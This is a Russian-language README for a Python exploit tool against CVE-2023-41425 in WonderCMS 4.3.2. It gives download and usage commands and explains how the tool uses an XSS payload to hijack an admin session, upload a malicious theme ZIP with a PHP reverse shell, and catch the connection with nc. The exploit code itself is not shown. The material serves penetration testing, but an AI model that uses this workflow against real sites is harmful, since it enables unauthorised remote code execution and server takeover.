
Автоматизирует создание и размещение JavaScript XSS-пейлоада для установки вредоносного модуля темы, вызывающего reverse shell через удалённое выполнение кода в WonderCMS. Этот инструмент использует PHP reverse shell скрипт PentestMonkey в качестве пейлоада.
Этот инструмент для наступательного тестирования безопасности, написанный на Python, автоматизирует эксплуатацию уязвимости удалённого выполнения кода (RCE) в WonderCMS 4.3.2, а именно CVE-2023-41425. Он упрощает процесс создания вредоносного ZIP-модуля темы и доставки XSS-пейлоада на основе JavaScript для перехвата сессии администратора и развёртывания PHP-реверс-шелла.
⚠️ Только для образовательных целей и авторизованного тестирования безопасности.
Скрипт использует только стандартную библиотеку Python. Внешние пакеты не требуются.
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip
unzip main.zip
cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git
cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php
Вот что скрипт делает под капотом:
Разбор аргументов:
argparse для сбора обязательных и необязательных входных данных от атакующего.Подготовка реверс-шелла:
$ip и $port переданными значениями -H и -p.Создание вредоносного ZIP:
<dir_name>/<php_reverse_shell.php>.<zip_name>.zip.Генерация XSS-пейлоада (script.js):
Инструкции и размещение эксплойта:
nc.Этот инструмент предоставляется по лицензии MIT.
Создано с 🔥 автором TeaOnHack🧋.
Этот проект предназначен только для образовательных целей и авторизованных оценок безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.
| Аргумент | Обязательный | Описание | По умолчанию |
|---|
-u | ✅ | URL страницы входа WonderCMS (например, http://target/index.php?...) | — |
-H, --host | ✅ | IP-адрес атакующего (для реверс-шелла) | — |
-p | ✅ | Порт прослушивания атакующего | — |
-r, --reverse-shell | ✅ | Путь к скрипту PHP-реверс-шелла | — |
--dir-name | ❌ | Каталог внутри ZIP-архива темы | TeaOn |
--http-port | ❌ | Порт для локального HTTP-сервера | 3000 |
--zip-name | ❌ | Имя создаваемого ZIP-файла | reverse-shell |